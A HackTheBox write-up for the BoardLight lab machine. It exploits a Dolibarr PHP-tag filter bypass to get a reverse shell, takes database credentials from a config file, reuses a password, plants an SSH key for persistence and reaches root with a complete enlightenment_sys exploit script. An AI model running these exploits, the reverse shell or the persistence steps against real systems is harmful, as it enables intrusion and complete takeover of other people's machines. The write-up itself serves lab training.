HackTheBox | BoardLight

In this walkthrough, I demonstrate how I obtained complete ownership of BoardLight on HackTheBox
In: HackTheBox, Attack, CTF, Linux, Easy Challenge

Nmap Results

target="10.129.139.70"
sudo nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt $target
# Nmap 7.94SVN scan initiated Tue May 28 16:37:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.139.70
Nmap scan report for 10.129.139.70
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 16:38:20 2024 -- 1 IP address (1 host up) scanned in 42.58 seconds





Service Enumeration

TCP/80

We can see board.htb referenced on the page, so let's add it to our hosts file:
echo -e '10.129.139.70\tboard.htb' | sudo tee -a /etc/hosts
The site renders the same with the hostname, so we carry on.

Gobuster Enumeration

Directories and Files

gobuster dir -u http://board.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -t 100 -o gobuster_80.txt
/about.php            (Status: 200) [Size: 9100]
/css                  (Status: 301) [Size: 304] [--> http://board.htb/css/]
/do.php               (Status: 200) [Size: 9209]
/images               (Status: 301) [Size: 307] [--> http://board.htb/images/]
/index.php            (Status: 200) [Size: 15949]
/js                   (Status: 301) [Size: 303] [--> http://board.htb/js/]

Nothing new discovered here



Virtual Hosts

# --domain : base domain of the target
# --append-domain : append the base domain to the end of every wordlist item
# -w : the wordlist to use
# -t : how many concurrent threads
# --delay : add a brief delay between requests to go easy on the server
# --exclude-length : the server responds with a body length of 301 for invalid names
gobuster vhost -k --domain board.htb --append-domain -u http://10.129.139.70 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --delay 10ms --exclude-length 301
Found: crm.board.htb Status: 200 [Size: 6360]
echo -e '10.129.139.70\tcrm.board.htb' | sudo tee -a /etc/hosts



CRM Enumeration

Google search: dolibarr 17.0.0 cve before:2024-05-01

Filter the results by date so that we don't include any HTB user content.

Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan
Swascan Offensive Security Team has identified a vulnerability on Dolibarr 17.0.0. The vulnerability can be tracked with id CVE-2023-30253. The vulnerability has been fixed in Dolibarr 17.0.1. Product description Dolibarr ERP & CRM is a modular software of business management which adapts to the size of the company (SME, Large companies, Freelancers or associations). Technical […]
So, we're going to need a credential...

Recall from before that we saw an email of info@board.htb, so that is one possible credential for the CRM. However, I did find that admin:admin allows us to login as well.



Testing the Exploit

💡
Our admin user has the ability to create and edit sites and pages. The premise of the vulnerability is that the application attempts to block an unprivileged user from running PHP scripts by blocking <?php in the site source code. However, we can bypass the PHP code restriction by simply specifying a <?PHP uppercase tag.
Click Websites and click the + button to add a website
Fill out accordingly and click Create
Click the + to add a Page
Fill out accordingly and click Create
Click Edit HTML Source
As noted in the PoC, we get an error with <?php
But bypass with <?PHP
Click the Binoculars icon to preview the page for easy execution
Note: There appears to be a cleanup script that removes these pages at regular intervals, so if you see an error similar to the one below, just recreate the site and page and try again.
The phpinfo() function executes as expected
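The case-sensitivity problem described above, as an added example that is not part of the original post and not Dolibarr's code: a Python sketch of a weak filter that matches only the lowercase open tag, beside a hardened check that matches every open-tag spelling PHP's lexer accepts. The sample page sources are constructed.

```python
import re

# Constructed samples of page source an editor might paste into the
# "Edit HTML Source" form (constructed for this example, not from the page).
SAMPLES = {
    "plain":      "<h1>Welcome</h1>",
    "lowercase":  "<h1>x</h1><?php phpinfo(); ?>",
    "uppercase":  "<h1>x</h1><?PHP phpinfo(); ?>",
    "mixedcase":  "<?Php echo 1; ?>",
    "short_echo": "<?= 1 ?>",
}


def contains_php_weak(source: str) -> bool:
    """Case-sensitive substring check for one spelling of the open tag.

    This is the assumed shape of the filter the walkthrough bypasses with
    <?PHP; it is not Dolibarr's actual code. PHP's lexer is case-insensitive,
    so every spelling this check misses still executes.
    """
    return "<?php" in source


def contains_php_hardened(source: str) -> bool:
    """Case-insensitive match on every open-tag form the interpreter accepts:
    <?php (any case, followed by whitespace), <?= and the bare <? short tag.
    <?xml is deliberately not matched: it is followed by neither whitespace nor '='.
    """
    return re.search(r"<\?(?:php\b|=|\s)", source, re.IGNORECASE) is not None


def bypasses(samples: dict) -> list:
    """Names of samples that carry PHP but slip past the weak check, i.e.
    the gap between what the filter blocks and what the interpreter runs."""
    return [
        name for name, src in samples.items()
        if contains_php_hardened(src) and not contains_php_weak(src)
    ]


if __name__ == "__main__":
    for name in bypasses(SAMPLES):
        print(f"{name}: executes as PHP but passes the case-sensitive filter")
```

A blocklist on one spelling is the wrong control; the durable fix is to keep the role that edits web pages out of anything that is interpreted as server-side code at all.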





Exploit

Reverse Shell

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php -O sh.php
nano sh.php
Update line 1 with the uppercase PHP
We need to update lines 49 and 50 with our listener IP and port
sudo rlwrap nc -lnvp 443
Create your test page and paste in the PHP reverse shell, save the page, and preview





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal    

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on localhost.   



Users and Groups

Local Users

larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash    

Local Groups

adm:x:4:syslog,larissa
larissa:x:1000:    



Network Configurations

Network Interfaces

eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:b9:89 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.32.44/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3421sec preferred_lft 3421sec
    inet6 dead:beef::250:56ff:feb0:b989/64 scope global dynamic mngtmpaddr 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:feb0:b989/64 scope link 
       valid_lft forever preferred_lft forever    

Open Ports

tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -



Interesting Files

/var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';    





Privilege Escalation

Dump the Database

During post-exploit enumeration we found the database credential for the dolibarr user in one of the configuration files.

💡
Configuration files are often a great first place to look when landing on a box, as they may contain credentials and other hard-coded information that helps us further our mission.
List the available databases
Use the dolibarr database and list tables
Dump the records from the llx_user table
We already know the admin password, so let's try to crack SuperAdmin's hash
⚠️
I didn't have any luck cracking this hash, but it's also worth checking if the database password is reused as a user password.



Lateral to Larissa

su larissa

Test for password reuse

Easy win!

Create an SSH Key File for Persistence

ssh-keygen -t rsa -b 4096 -C '' -N ''

Run on Kali to generate an SSH key pair

cat id_rsa.pub

Copy the public key string to your clipboard

echo '... public key string here ...' > /home/larissa/.ssh/authorized_keys

Add your SSH public key to Larissa's authorized keys file

ssh -i id_rsa larissa@board.htb

Now, use your private key back on Kali to log in over SSH



Escalate to Root

find / -perm /4000 2>/dev/null

List SUID binaries as part of post-exploit enumeration

/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset

I'm not familiar with these SUID binaries, but they are owned by root, so it's research time

Google search: enlightenment_sys privilege escalation

Search Google for privilege escalation using this SUID binary

A vulnerable version is installed!
GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)



Exploitation

The vulnerability is in the way the enlightenment_sys component handles paths that start with /dev/..: the traversal leads back to the filesystem root, which allows a malicious user to have the SUID helper act on a program in a writable path anywhere below /.

nano /tmp/pwn.sh
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
bash /tmp/pwn.sh
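The path check described above, as an added example that is not part of the original post or of Enlightenment's source: a Python sketch of the textual prefix test the CVE description implies, beside a check that canonicalises the path before testing the prefix and refuses shell metacharacters, run over the PoC's own source path and constructed comparison paths.

```python
import os
import re

# The source path the PoC script above hands to enlightenment_sys, plus
# constructed comparison paths (not from the page).
POC_PATH = "/dev/../tmp/;/tmp/exploit"
CASES = [
    "/dev/sdb1",              # a plain device path: should be allowed
    "/dev/../dev/sdb1",       # traversal that stays inside /dev
    "/dev/../etc/passwd",     # traversal that escapes /dev
    POC_PATH,                 # traversal plus a ';' aimed at a shell
]

# Characters a POSIX shell treats specially; a path that ends up in a
# system()/sh -c command line must not contain any of them.
SHELL_META = re.compile(r"""[;&|`$<>()\[\]{}*?!~\s'"\\]""")


def allowed_weak(path: str) -> bool:
    """Textual prefix test, the shape of check the CVE description implies
    (assumed, not Enlightenment's actual code). '/dev/../tmp/...' passes."""
    return path.startswith("/dev/")


def allowed_hardened(path: str) -> bool:
    """Canonicalise before testing the prefix, and refuse shell
    metacharacters because the helper builds a mount command line.
    normpath is lexical so the example runs offline; on a real host use
    os.path.realpath so that symlinks under /dev are resolved as well."""
    canonical = os.path.normpath(path)
    if not canonical.startswith("/dev/"):
        return False                      # escaped /dev via '..'
    if SHELL_META.search(path):
        return False                      # would be interpreted by sh -c
    return True


def audit(paths: list) -> dict:
    """Map each path to (weak verdict, hardened verdict)."""
    return {p: (allowed_weak(p), allowed_hardened(p)) for p in paths}


if __name__ == "__main__":
    for path, (weak, hard) in audit(CASES).items():
        print(f"{path!r}: prefix-check={weak} canonical-check={hard}")
```

Even with the path check fixed, a SUID helper should execute mount with an argv array rather than through a shell, so that a ';' in a filename can only ever be a filename byte.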



Flags

User

b3e9e7d4e2f3671c35e6a49e2440fb98    

Root

648dd6401e5ae0d7122776b67fed5724    